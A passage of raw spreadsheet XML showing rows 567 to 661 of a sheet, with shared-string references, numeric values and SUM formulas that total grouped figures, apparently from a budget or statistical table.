      <c r="E567" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F567" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="568" spans="1:6">
      <c r="A568" s="10"/>
      <c r="B568" s="10"/>
      <c r="C568" s="28"/>
      <c r="D568" s="10" t="s">
        <v>5281</v>
      </c>
      <c r="E568" s="16" t="s">
        <v>3390</v>
      </c>
      <c r="F568" s="17">
        <v>221</v>
      </c>
    </row>
    <row r="569" spans="1:6">
      <c r="A569" s="10"/>
      <c r="B569" s="10"/>
      <c r="C569" s="28"/>
      <c r="D569" s="10" t="s">
        <v>5282</v>
      </c>
      <c r="E569" s="11" t="s">
        <v>3391</v>
      </c>
      <c r="F569" s="12">
        <f>SUM(F570:F576)</f>
        <v>2956</v>
      </c>
    </row>
    <row r="570" spans="1:6">
      <c r="A570" s="10"/>
      <c r="B570" s="10"/>
      <c r="C570" s="28"/>
      <c r="D570" s="10" t="s">
        <v>5283</v>
      </c>
      <c r="E570" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F570" s="17">
        <v>574</v>
      </c>
    </row>
    <row r="571" spans="1:6">
      <c r="A571" s="10"/>
      <c r="B571" s="10"/>
      <c r="C571" s="28"/>
      <c r="D571" s="10" t="s">
        <v>5284</v>
      </c>
      <c r="E571" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F571" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="572" spans="1:6">
      <c r="A572" s="10"/>
      <c r="B572" s="10"/>
      <c r="C572" s="28"/>
      <c r="D572" s="10" t="s">
        <v>5285</v>
      </c>
      <c r="E572" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F572" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="573" spans="1:6">
      <c r="A573" s="10"/>
      <c r="B573" s="10"/>
      <c r="C573" s="28"/>
      <c r="D573" s="10" t="s">
        <v>5286</v>
      </c>
      <c r="E573" s="16" t="s">
        <v>3392</v>
      </c>
      <c r="F573" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="574" spans="1:6">
      <c r="A574" s="10"/>
      <c r="B574" s="10"/>
      <c r="C574" s="28"/>
      <c r="D574" s="10" t="s">
        <v>5287</v>
      </c>
      <c r="E574" s="16" t="s">
        <v>3393</v>
      </c>
      <c r="F574" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="575" spans="1:6">
      <c r="A575" s="10"/>
      <c r="B575" s="10"/>
      <c r="C575" s="28"/>
      <c r="D575" s="10" t="s">
        <v>5288</v>
      </c>
      <c r="E575" s="16" t="s">
        <v>3394</v>
      </c>
      <c r="F575" s="17">
        <v>2245</v>
      </c>
    </row>
    <row r="576" spans="1:6">
      <c r="A576" s="10"/>
      <c r="B576" s="10"/>
      <c r="C576" s="28"/>
      <c r="D576" s="10" t="s">
        <v>5289</v>
      </c>
      <c r="E576" s="16" t="s">
        <v>3395</v>
      </c>
      <c r="F576" s="17">
        <v>137</v>
      </c>
    </row>
    <row r="577" spans="1:6">
      <c r="A577" s="10"/>
      <c r="B577" s="10"/>
      <c r="C577" s="28"/>
      <c r="D577" s="10" t="s">
        <v>5290</v>
      </c>
      <c r="E577" s="11" t="s">
        <v>3396</v>
      </c>
      <c r="F577" s="12">
        <f>F578</f>
        <v>0</v>
      </c>
    </row>
    <row r="578" spans="1:6">
      <c r="A578" s="10"/>
      <c r="B578" s="10"/>
      <c r="C578" s="28"/>
      <c r="D578" s="10" t="s">
        <v>5291</v>
      </c>
      <c r="E578" s="16" t="s">
        <v>3397</v>
      </c>
      <c r="F578" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="579" spans="1:6">
      <c r="A579" s="10"/>
      <c r="B579" s="10"/>
      <c r="C579" s="28"/>
      <c r="D579" s="10" t="s">
        <v>5292</v>
      </c>
      <c r="E579" s="11" t="s">
        <v>3398</v>
      </c>
      <c r="F579" s="12">
        <f>SUM(F580:F587)</f>
        <v>33544</v>
      </c>
    </row>
    <row r="580" spans="1:6">
      <c r="A580" s="10"/>
      <c r="B580" s="10"/>
      <c r="C580" s="28"/>
      <c r="D580" s="10" t="s">
        <v>5293</v>
      </c>
      <c r="E580" s="16" t="s">
        <v>3399</v>
      </c>
      <c r="F580" s="17">
        <v>1297</v>
      </c>
    </row>
    <row r="581" spans="1:6">
      <c r="A581" s="10"/>
      <c r="B581" s="10"/>
      <c r="C581" s="28"/>
      <c r="D581" s="10" t="s">
        <v>5294</v>
      </c>
      <c r="E581" s="16" t="s">
        <v>3400</v>
      </c>
      <c r="F581" s="17">
        <v>311</v>
      </c>
    </row>
    <row r="582" spans="1:6">
      <c r="A582" s="10"/>
      <c r="B582" s="10"/>
      <c r="C582" s="28"/>
      <c r="D582" s="10" t="s">
        <v>5295</v>
      </c>
      <c r="E582" s="16" t="s">
        <v>3401</v>
      </c>
      <c r="F582" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="583" spans="1:6">
      <c r="A583" s="10"/>
      <c r="B583" s="10"/>
      <c r="C583" s="28"/>
      <c r="D583" s="10" t="s">
        <v>5296</v>
      </c>
      <c r="E583" s="16" t="s">
        <v>3402</v>
      </c>
      <c r="F583" s="17">
        <v>11940</v>
      </c>
    </row>
    <row r="584" spans="1:6">
      <c r="A584" s="10"/>
      <c r="B584" s="10"/>
      <c r="C584" s="28"/>
      <c r="D584" s="10" t="s">
        <v>5297</v>
      </c>
      <c r="E584" s="16" t="s">
        <v>3403</v>
      </c>
      <c r="F584" s="17">
        <v>1238</v>
      </c>
    </row>
    <row r="585" spans="1:6">
      <c r="A585" s="10"/>
      <c r="B585" s="10"/>
      <c r="C585" s="28"/>
      <c r="D585" s="10" t="s">
        <v>5298</v>
      </c>
      <c r="E585" s="16" t="s">
        <v>3404</v>
      </c>
      <c r="F585" s="17">
        <v>18006</v>
      </c>
    </row>
    <row r="586" spans="1:6">
      <c r="A586" s="10"/>
      <c r="B586" s="10"/>
      <c r="C586" s="28"/>
      <c r="D586" s="10" t="s">
        <v>5299</v>
      </c>
      <c r="E586" s="16" t="s">
        <v>3405</v>
      </c>
      <c r="F586" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="587" spans="1:6">
      <c r="A587" s="10"/>
      <c r="B587" s="10"/>
      <c r="C587" s="28"/>
      <c r="D587" s="10" t="s">
        <v>5300</v>
      </c>
      <c r="E587" s="16" t="s">
        <v>3406</v>
      </c>
      <c r="F587" s="17">
        <v>752</v>
      </c>
    </row>
    <row r="588" spans="1:6">
      <c r="A588" s="10"/>
      <c r="B588" s="10"/>
      <c r="C588" s="28"/>
      <c r="D588" s="10" t="s">
        <v>5301</v>
      </c>
      <c r="E588" s="11" t="s">
        <v>3407</v>
      </c>
      <c r="F588" s="12">
        <f>SUM(F589:F591)</f>
        <v>0</v>
      </c>
    </row>
    <row r="589" spans="1:6">
      <c r="A589" s="10"/>
      <c r="B589" s="10"/>
      <c r="C589" s="28"/>
      <c r="D589" s="10" t="s">
        <v>5302</v>
      </c>
      <c r="E589" s="16" t="s">
        <v>3408</v>
      </c>
      <c r="F589" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="590" spans="1:6">
      <c r="A590" s="10"/>
      <c r="B590" s="10"/>
      <c r="C590" s="28"/>
      <c r="D590" s="10" t="s">
        <v>5303</v>
      </c>
      <c r="E590" s="16" t="s">
        <v>3409</v>
      </c>
      <c r="F590" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="591" spans="1:6">
      <c r="A591" s="10"/>
      <c r="B591" s="10"/>
      <c r="C591" s="28"/>
      <c r="D591" s="10" t="s">
        <v>5304</v>
      </c>
      <c r="E591" s="16" t="s">
        <v>3410</v>
      </c>
      <c r="F591" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="592" spans="1:6">
      <c r="A592" s="10"/>
      <c r="B592" s="10"/>
      <c r="C592" s="28"/>
      <c r="D592" s="10" t="s">
        <v>5305</v>
      </c>
      <c r="E592" s="11" t="s">
        <v>3411</v>
      </c>
      <c r="F592" s="12">
        <f>SUM(F593:F601)</f>
        <v>795</v>
      </c>
    </row>
    <row r="593" spans="1:6">
      <c r="A593" s="10"/>
      <c r="B593" s="10"/>
      <c r="C593" s="28"/>
      <c r="D593" s="10" t="s">
        <v>5306</v>
      </c>
      <c r="E593" s="16" t="s">
        <v>3412</v>
      </c>
      <c r="F593" s="17">
        <v>313</v>
      </c>
    </row>
    <row r="594" spans="1:6">
      <c r="A594" s="10"/>
      <c r="B594" s="10"/>
      <c r="C594" s="28"/>
      <c r="D594" s="10" t="s">
        <v>5307</v>
      </c>
      <c r="E594" s="16" t="s">
        <v>3413</v>
      </c>
      <c r="F594" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="595" spans="1:6">
      <c r="A595" s="10"/>
      <c r="B595" s="10"/>
      <c r="C595" s="28"/>
      <c r="D595" s="10" t="s">
        <v>5308</v>
      </c>
      <c r="E595" s="16" t="s">
        <v>3414</v>
      </c>
      <c r="F595" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="596" spans="1:6">
      <c r="A596" s="10"/>
      <c r="B596" s="10"/>
      <c r="C596" s="28"/>
      <c r="D596" s="10" t="s">
        <v>5309</v>
      </c>
      <c r="E596" s="16" t="s">
        <v>3415</v>
      </c>
      <c r="F596" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="597" spans="1:6">
      <c r="A597" s="10"/>
      <c r="B597" s="10"/>
      <c r="C597" s="28"/>
      <c r="D597" s="10" t="s">
        <v>5310</v>
      </c>
      <c r="E597" s="16" t="s">
        <v>3416</v>
      </c>
      <c r="F597" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="598" spans="1:6">
      <c r="A598" s="10"/>
      <c r="B598" s="10"/>
      <c r="C598" s="28"/>
      <c r="D598" s="10" t="s">
        <v>5311</v>
      </c>
      <c r="E598" s="16" t="s">
        <v>3417</v>
      </c>
      <c r="F598" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="599" spans="1:6">
      <c r="A599" s="10"/>
      <c r="B599" s="10"/>
      <c r="C599" s="28"/>
      <c r="D599" s="10" t="s">
        <v>5312</v>
      </c>
      <c r="E599" s="16" t="s">
        <v>3418</v>
      </c>
      <c r="F599" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="600" spans="1:6">
      <c r="A600" s="10"/>
      <c r="B600" s="10"/>
      <c r="C600" s="28"/>
      <c r="D600" s="10" t="s">
        <v>5313</v>
      </c>
      <c r="E600" s="16" t="s">
        <v>3419</v>
      </c>
      <c r="F600" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="601" spans="1:6">
      <c r="A601" s="10"/>
      <c r="B601" s="10"/>
      <c r="C601" s="28"/>
      <c r="D601" s="10" t="s">
        <v>5314</v>
      </c>
      <c r="E601" s="16" t="s">
        <v>3420</v>
      </c>
      <c r="F601" s="17">
        <v>482</v>
      </c>
    </row>
    <row r="602" spans="1:6">
      <c r="A602" s="10"/>
      <c r="B602" s="10"/>
      <c r="C602" s="28"/>
      <c r="D602" s="10" t="s">
        <v>5315</v>
      </c>
      <c r="E602" s="11" t="s">
        <v>3421</v>
      </c>
      <c r="F602" s="12">
        <f>SUM(F603:F609)</f>
        <v>7189</v>
      </c>
    </row>
    <row r="603" spans="1:6">
      <c r="A603" s="10"/>
      <c r="B603" s="10"/>
      <c r="C603" s="28"/>
      <c r="D603" s="10" t="s">
        <v>5316</v>
      </c>
      <c r="E603" s="16" t="s">
        <v>3422</v>
      </c>
      <c r="F603" s="17">
        <v>327</v>
      </c>
    </row>
    <row r="604" spans="1:6">
      <c r="A604" s="10"/>
      <c r="B604" s="10"/>
      <c r="C604" s="28"/>
      <c r="D604" s="10" t="s">
        <v>5317</v>
      </c>
      <c r="E604" s="16" t="s">
        <v>3423</v>
      </c>
      <c r="F604" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="605" spans="1:6">
      <c r="A605" s="10"/>
      <c r="B605" s="10"/>
      <c r="C605" s="28"/>
      <c r="D605" s="10" t="s">
        <v>5318</v>
      </c>
      <c r="E605" s="16" t="s">
        <v>3424</v>
      </c>
      <c r="F605" s="17">
        <v>4110</v>
      </c>
    </row>
    <row r="606" spans="1:6">
      <c r="A606" s="10"/>
      <c r="B606" s="10"/>
      <c r="C606" s="28"/>
      <c r="D606" s="10" t="s">
        <v>5319</v>
      </c>
      <c r="E606" s="16" t="s">
        <v>3425</v>
      </c>
      <c r="F606" s="17">
        <v>501</v>
      </c>
    </row>
    <row r="607" spans="1:6">
      <c r="A607" s="10"/>
      <c r="B607" s="10"/>
      <c r="C607" s="28"/>
      <c r="D607" s="10" t="s">
        <v>5320</v>
      </c>
      <c r="E607" s="16" t="s">
        <v>3426</v>
      </c>
      <c r="F607" s="17">
        <v>935</v>
      </c>
    </row>
    <row r="608" spans="1:6">
      <c r="A608" s="10"/>
      <c r="B608" s="10"/>
      <c r="C608" s="28"/>
      <c r="D608" s="10" t="s">
        <v>5321</v>
      </c>
      <c r="E608" s="16" t="s">
        <v>3427</v>
      </c>
      <c r="F608" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="609" spans="1:6">
      <c r="A609" s="10"/>
      <c r="B609" s="10"/>
      <c r="C609" s="28"/>
      <c r="D609" s="10" t="s">
        <v>5322</v>
      </c>
      <c r="E609" s="16" t="s">
        <v>3428</v>
      </c>
      <c r="F609" s="17">
        <v>1316</v>
      </c>
    </row>
    <row r="610" spans="1:6">
      <c r="A610" s="10"/>
      <c r="B610" s="10"/>
      <c r="C610" s="28"/>
      <c r="D610" s="10" t="s">
        <v>5323</v>
      </c>
      <c r="E610" s="11" t="s">
        <v>3429</v>
      </c>
      <c r="F610" s="12">
        <f>SUM(F611:F616)</f>
        <v>3033</v>
      </c>
    </row>
    <row r="611" spans="1:6">
      <c r="A611" s="10"/>
      <c r="B611" s="10"/>
      <c r="C611" s="28"/>
      <c r="D611" s="10" t="s">
        <v>5324</v>
      </c>
      <c r="E611" s="16" t="s">
        <v>3430</v>
      </c>
      <c r="F611" s="17">
        <v>1963</v>
      </c>
    </row>
    <row r="612" spans="1:6">
      <c r="A612" s="10"/>
      <c r="B612" s="10"/>
      <c r="C612" s="28"/>
      <c r="D612" s="10" t="s">
        <v>5325</v>
      </c>
      <c r="E612" s="16" t="s">
        <v>3431</v>
      </c>
      <c r="F612" s="17">
        <v>279</v>
      </c>
    </row>
    <row r="613" spans="1:6">
      <c r="A613" s="10"/>
      <c r="B613" s="10"/>
      <c r="C613" s="28"/>
      <c r="D613" s="10" t="s">
        <v>5326</v>
      </c>
      <c r="E613" s="16" t="s">
        <v>3432</v>
      </c>
      <c r="F613" s="17">
        <v>13</v>
      </c>
    </row>
    <row r="614" spans="1:6">
      <c r="A614" s="10"/>
      <c r="B614" s="10"/>
      <c r="C614" s="28"/>
      <c r="D614" s="10" t="s">
        <v>5327</v>
      </c>
      <c r="E614" s="16" t="s">
        <v>3433</v>
      </c>
      <c r="F614" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="615" spans="1:6">
      <c r="A615" s="10"/>
      <c r="B615" s="10"/>
      <c r="C615" s="28"/>
      <c r="D615" s="10" t="s">
        <v>5328</v>
      </c>
      <c r="E615" s="16" t="s">
        <v>3434</v>
      </c>
      <c r="F615" s="17">
        <v>180</v>
      </c>
    </row>
    <row r="616" spans="1:6">
      <c r="A616" s="10"/>
      <c r="B616" s="10"/>
      <c r="C616" s="28"/>
      <c r="D616" s="10" t="s">
        <v>5329</v>
      </c>
      <c r="E616" s="16" t="s">
        <v>3435</v>
      </c>
      <c r="F616" s="17">
        <v>598</v>
      </c>
    </row>
    <row r="617" spans="1:6">
      <c r="A617" s="10"/>
      <c r="B617" s="10"/>
      <c r="C617" s="28"/>
      <c r="D617" s="10" t="s">
        <v>5330</v>
      </c>
      <c r="E617" s="11" t="s">
        <v>3436</v>
      </c>
      <c r="F617" s="12">
        <f>SUM(F618:F624)</f>
        <v>1917</v>
      </c>
    </row>
    <row r="618" spans="1:6">
      <c r="A618" s="10"/>
      <c r="B618" s="10"/>
      <c r="C618" s="28"/>
      <c r="D618" s="10" t="s">
        <v>5331</v>
      </c>
      <c r="E618" s="16" t="s">
        <v>3437</v>
      </c>
      <c r="F618" s="17">
        <v>185</v>
      </c>
    </row>
    <row r="619" spans="1:6">
      <c r="A619" s="10"/>
      <c r="B619" s="10"/>
      <c r="C619" s="28"/>
      <c r="D619" s="10" t="s">
        <v>5332</v>
      </c>
      <c r="E619" s="16" t="s">
        <v>3438</v>
      </c>
      <c r="F619" s="17">
        <v>880</v>
      </c>
    </row>
    <row r="620" spans="1:6">
      <c r="A620" s="10"/>
      <c r="B620" s="10"/>
      <c r="C620" s="28"/>
      <c r="D620" s="10" t="s">
        <v>5333</v>
      </c>
      <c r="E620" s="16" t="s">
        <v>3439</v>
      </c>
      <c r="F620" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="621" spans="1:6">
      <c r="A621" s="10"/>
      <c r="B621" s="10"/>
      <c r="C621" s="28"/>
      <c r="D621" s="10" t="s">
        <v>5334</v>
      </c>
      <c r="E621" s="16" t="s">
        <v>3440</v>
      </c>
      <c r="F621" s="17">
        <v>644</v>
      </c>
    </row>
    <row r="622" spans="1:6">
      <c r="A622" s="10"/>
      <c r="B622" s="10"/>
      <c r="C622" s="28"/>
      <c r="D622" s="10" t="s">
        <v>5335</v>
      </c>
      <c r="E622" s="16" t="s">
        <v>3441</v>
      </c>
      <c r="F622" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="623" spans="1:6">
      <c r="A623" s="10"/>
      <c r="B623" s="10"/>
      <c r="C623" s="28"/>
      <c r="D623" s="10" t="s">
        <v>5336</v>
      </c>
      <c r="E623" s="16" t="s">
        <v>3442</v>
      </c>
      <c r="F623" s="17">
        <v>208</v>
      </c>
    </row>
    <row r="624" spans="1:6">
      <c r="A624" s="10"/>
      <c r="B624" s="10"/>
      <c r="C624" s="28"/>
      <c r="D624" s="10" t="s">
        <v>5337</v>
      </c>
      <c r="E624" s="16" t="s">
        <v>3443</v>
      </c>
      <c r="F624" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="625" spans="1:6">
      <c r="A625" s="10"/>
      <c r="B625" s="10"/>
      <c r="C625" s="28"/>
      <c r="D625" s="10" t="s">
        <v>5338</v>
      </c>
      <c r="E625" s="11" t="s">
        <v>3444</v>
      </c>
      <c r="F625" s="12">
        <f>SUM(F626:F633)</f>
        <v>2746</v>
      </c>
    </row>
    <row r="626" spans="1:6">
      <c r="A626" s="10"/>
      <c r="B626" s="10"/>
      <c r="C626" s="28"/>
      <c r="D626" s="10" t="s">
        <v>5339</v>
      </c>
      <c r="E626" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F626" s="17">
        <v>133</v>
      </c>
    </row>
    <row r="627" spans="1:6">
      <c r="A627" s="10"/>
      <c r="B627" s="10"/>
      <c r="C627" s="28"/>
      <c r="D627" s="10" t="s">
        <v>5340</v>
      </c>
      <c r="E627" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F627" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="628" spans="1:6">
      <c r="A628" s="10"/>
      <c r="B628" s="10"/>
      <c r="C628" s="28"/>
      <c r="D628" s="10" t="s">
        <v>5341</v>
      </c>
      <c r="E628" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F628" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="629" spans="1:6">
      <c r="A629" s="10"/>
      <c r="B629" s="10"/>
      <c r="C629" s="28"/>
      <c r="D629" s="10" t="s">
        <v>5342</v>
      </c>
      <c r="E629" s="16" t="s">
        <v>3445</v>
      </c>
      <c r="F629" s="17">
        <v>253</v>
      </c>
    </row>
    <row r="630" spans="1:6">
      <c r="A630" s="10"/>
      <c r="B630" s="10"/>
      <c r="C630" s="28"/>
      <c r="D630" s="10" t="s">
        <v>5343</v>
      </c>
      <c r="E630" s="16" t="s">
        <v>3446</v>
      </c>
      <c r="F630" s="17">
        <v>128</v>
      </c>
    </row>
    <row r="631" spans="1:6">
      <c r="A631" s="10"/>
      <c r="B631" s="10"/>
      <c r="C631" s="28"/>
      <c r="D631" s="10" t="s">
        <v>5344</v>
      </c>
      <c r="E631" s="16" t="s">
        <v>3447</v>
      </c>
      <c r="F631" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="632" spans="1:6">
      <c r="A632" s="10"/>
      <c r="B632" s="10"/>
      <c r="C632" s="28"/>
      <c r="D632" s="10" t="s">
        <v>5345</v>
      </c>
      <c r="E632" s="16" t="s">
        <v>3448</v>
      </c>
      <c r="F632" s="17">
        <v>2100</v>
      </c>
    </row>
    <row r="633" spans="1:6">
      <c r="A633" s="10"/>
      <c r="B633" s="10"/>
      <c r="C633" s="28"/>
      <c r="D633" s="10" t="s">
        <v>5346</v>
      </c>
      <c r="E633" s="16" t="s">
        <v>3449</v>
      </c>
      <c r="F633" s="17">
        <v>132</v>
      </c>
    </row>
    <row r="634" spans="1:6">
      <c r="A634" s="10"/>
      <c r="B634" s="10"/>
      <c r="C634" s="28"/>
      <c r="D634" s="10" t="s">
        <v>5347</v>
      </c>
      <c r="E634" s="11" t="s">
        <v>3450</v>
      </c>
      <c r="F634" s="12">
        <f>SUM(F635:F638)</f>
        <v>51</v>
      </c>
    </row>
    <row r="635" spans="1:6">
      <c r="A635" s="10"/>
      <c r="B635" s="10"/>
      <c r="C635" s="28"/>
      <c r="D635" s="10" t="s">
        <v>5348</v>
      </c>
      <c r="E635" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F635" s="17">
        <v>51</v>
      </c>
    </row>
    <row r="636" spans="1:6">
      <c r="A636" s="10"/>
      <c r="B636" s="10"/>
      <c r="C636" s="28"/>
      <c r="D636" s="10" t="s">
        <v>5349</v>
      </c>
      <c r="E636" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F636" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="637" spans="1:6">
      <c r="A637" s="10"/>
      <c r="B637" s="10"/>
      <c r="C637" s="28"/>
      <c r="D637" s="10" t="s">
        <v>5350</v>
      </c>
      <c r="E637" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F637" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="638" spans="1:6">
      <c r="A638" s="10"/>
      <c r="B638" s="10"/>
      <c r="C638" s="28"/>
      <c r="D638" s="10" t="s">
        <v>5351</v>
      </c>
      <c r="E638" s="16" t="s">
        <v>3451</v>
      </c>
      <c r="F638" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="639" spans="1:6">
      <c r="A639" s="10"/>
      <c r="B639" s="10"/>
      <c r="C639" s="28"/>
      <c r="D639" s="10" t="s">
        <v>5352</v>
      </c>
      <c r="E639" s="11" t="s">
        <v>3452</v>
      </c>
      <c r="F639" s="12">
        <f>SUM(F640:F641)</f>
        <v>12038</v>
      </c>
    </row>
    <row r="640" spans="1:6">
      <c r="A640" s="10"/>
      <c r="B640" s="10"/>
      <c r="C640" s="28"/>
      <c r="D640" s="10" t="s">
        <v>5353</v>
      </c>
      <c r="E640" s="16" t="s">
        <v>3453</v>
      </c>
      <c r="F640" s="17">
        <v>354</v>
      </c>
    </row>
    <row r="641" spans="1:6">
      <c r="A641" s="10"/>
      <c r="B641" s="10"/>
      <c r="C641" s="28"/>
      <c r="D641" s="10" t="s">
        <v>5354</v>
      </c>
      <c r="E641" s="16" t="s">
        <v>3454</v>
      </c>
      <c r="F641" s="17">
        <v>11684</v>
      </c>
    </row>
    <row r="642" spans="1:6">
      <c r="A642" s="10"/>
      <c r="B642" s="10"/>
      <c r="C642" s="28"/>
      <c r="D642" s="10" t="s">
        <v>5355</v>
      </c>
      <c r="E642" s="11" t="s">
        <v>3455</v>
      </c>
      <c r="F642" s="12">
        <f>SUM(F643:F644)</f>
        <v>3151</v>
      </c>
    </row>
    <row r="643" spans="1:6">
      <c r="A643" s="10"/>
      <c r="B643" s="10"/>
      <c r="C643" s="28"/>
      <c r="D643" s="10" t="s">
        <v>5356</v>
      </c>
      <c r="E643" s="16" t="s">
        <v>3456</v>
      </c>
      <c r="F643" s="17">
        <v>3149</v>
      </c>
    </row>
    <row r="644" spans="1:6">
      <c r="A644" s="10"/>
      <c r="B644" s="10"/>
      <c r="C644" s="28"/>
      <c r="D644" s="10" t="s">
        <v>5357</v>
      </c>
      <c r="E644" s="16" t="s">
        <v>3457</v>
      </c>
      <c r="F644" s="17">
        <v>2</v>
      </c>
    </row>
    <row r="645" spans="1:6">
      <c r="A645" s="10"/>
      <c r="B645" s="10"/>
      <c r="C645" s="28"/>
      <c r="D645" s="10" t="s">
        <v>5358</v>
      </c>
      <c r="E645" s="11" t="s">
        <v>3458</v>
      </c>
      <c r="F645" s="12">
        <f>SUM(F646:F647)</f>
        <v>2021</v>
      </c>
    </row>
    <row r="646" spans="1:6">
      <c r="A646" s="10"/>
      <c r="B646" s="10"/>
      <c r="C646" s="28"/>
      <c r="D646" s="10" t="s">
        <v>5359</v>
      </c>
      <c r="E646" s="16" t="s">
        <v>3459</v>
      </c>
      <c r="F646" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="647" spans="1:6">
      <c r="A647" s="10"/>
      <c r="B647" s="10"/>
      <c r="C647" s="28"/>
      <c r="D647" s="10" t="s">
        <v>5360</v>
      </c>
      <c r="E647" s="16" t="s">
        <v>3460</v>
      </c>
      <c r="F647" s="17">
        <v>2021</v>
      </c>
    </row>
    <row r="648" spans="1:6">
      <c r="A648" s="10"/>
      <c r="B648" s="10"/>
      <c r="C648" s="28"/>
      <c r="D648" s="10" t="s">
        <v>5361</v>
      </c>
      <c r="E648" s="11" t="s">
        <v>3461</v>
      </c>
      <c r="F648" s="12">
        <f>SUM(F649:F650)</f>
        <v>0</v>
      </c>
    </row>
    <row r="649" spans="1:6">
      <c r="A649" s="10"/>
      <c r="B649" s="10"/>
      <c r="C649" s="28"/>
      <c r="D649" s="10" t="s">
        <v>5362</v>
      </c>
      <c r="E649" s="16" t="s">
        <v>3462</v>
      </c>
      <c r="F649" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="650" spans="1:6">
      <c r="A650" s="10"/>
      <c r="B650" s="10"/>
      <c r="C650" s="28"/>
      <c r="D650" s="10" t="s">
        <v>5363</v>
      </c>
      <c r="E650" s="16" t="s">
        <v>3463</v>
      </c>
      <c r="F650" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="651" spans="1:6">
      <c r="A651" s="10"/>
      <c r="B651" s="10"/>
      <c r="C651" s="28"/>
      <c r="D651" s="10" t="s">
        <v>5364</v>
      </c>
      <c r="E651" s="11" t="s">
        <v>3464</v>
      </c>
      <c r="F651" s="12">
        <f>SUM(F652:F653)</f>
        <v>219</v>
      </c>
    </row>
    <row r="652" spans="1:6">
      <c r="A652" s="10"/>
      <c r="B652" s="10"/>
      <c r="C652" s="28"/>
      <c r="D652" s="10" t="s">
        <v>5365</v>
      </c>
      <c r="E652" s="16" t="s">
        <v>3465</v>
      </c>
      <c r="F652" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="653" spans="1:6">
      <c r="A653" s="10"/>
      <c r="B653" s="10"/>
      <c r="C653" s="28"/>
      <c r="D653" s="10" t="s">
        <v>5366</v>
      </c>
      <c r="E653" s="16" t="s">
        <v>3466</v>
      </c>
      <c r="F653" s="17">
        <v>219</v>
      </c>
    </row>
    <row r="654" spans="1:6">
      <c r="A654" s="10"/>
      <c r="B654" s="10"/>
      <c r="C654" s="28"/>
      <c r="D654" s="10" t="s">
        <v>5367</v>
      </c>
      <c r="E654" s="11" t="s">
        <v>3467</v>
      </c>
      <c r="F654" s="12">
        <f>SUM(F655:F657)</f>
        <v>23468</v>
      </c>
    </row>
    <row r="655" spans="1:6">
      <c r="A655" s="10"/>
      <c r="B655" s="10"/>
      <c r="C655" s="28"/>
      <c r="D655" s="10" t="s">
        <v>5368</v>
      </c>
      <c r="E655" s="16" t="s">
        <v>3468</v>
      </c>
      <c r="F655" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="656" spans="1:6">
      <c r="A656" s="10"/>
      <c r="B656" s="10"/>
      <c r="C656" s="28"/>
      <c r="D656" s="10" t="s">
        <v>5369</v>
      </c>
      <c r="E656" s="16" t="s">
        <v>3469</v>
      </c>
      <c r="F656" s="17">
        <v>23468</v>
      </c>
    </row>
    <row r="657" spans="1:6">
      <c r="A657" s="10"/>
      <c r="B657" s="10"/>
      <c r="C657" s="28"/>
      <c r="D657" s="10" t="s">
        <v>5370</v>
      </c>
      <c r="E657" s="16" t="s">
        <v>3470</v>
      </c>
      <c r="F657" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="658" spans="1:6">
      <c r="A658" s="10"/>
      <c r="B658" s="10"/>
      <c r="C658" s="28"/>
      <c r="D658" s="10" t="s">
        <v>5371</v>
      </c>
      <c r="E658" s="11" t="s">
        <v>3471</v>
      </c>
      <c r="F658" s="12">
        <f>SUM(F659:F661)</f>
        <v>666</v>
      </c>
    </row>
    <row r="659" spans="1:6">
      <c r="A659" s="10"/>
      <c r="B659" s="10"/>
      <c r="C659" s="28"/>
      <c r="D659" s="10" t="s">
        <v>5372</v>
      </c>
      <c r="E659" s="16" t="s">
        <v>3472</v>
      </c>
      <c r="F659" s="17">
        <v>110</v>
      </c>
    </row>
    <row r="660" spans="1:6">
      <c r="A660" s="10"/>
      <c r="B660" s="10"/>
      <c r="C660" s="28"/>
      <c r="D660" s="10" t="s">
        <v>5373</v>
      </c>
      <c r="E660" s="16" t="s">
        <v>3473</v>
      </c>
      <c r="F660" s="17">
        <v>66</v>
      </c>
    </row>
    <row r="661" spans="1:6">
      <c r="A661" s="10"/>
      <c r="B661" s="10"/>
      <c r="C661" s="28"/>
      <c r="D661" s="10" t="s">
        <v>5374</v>
      </c>
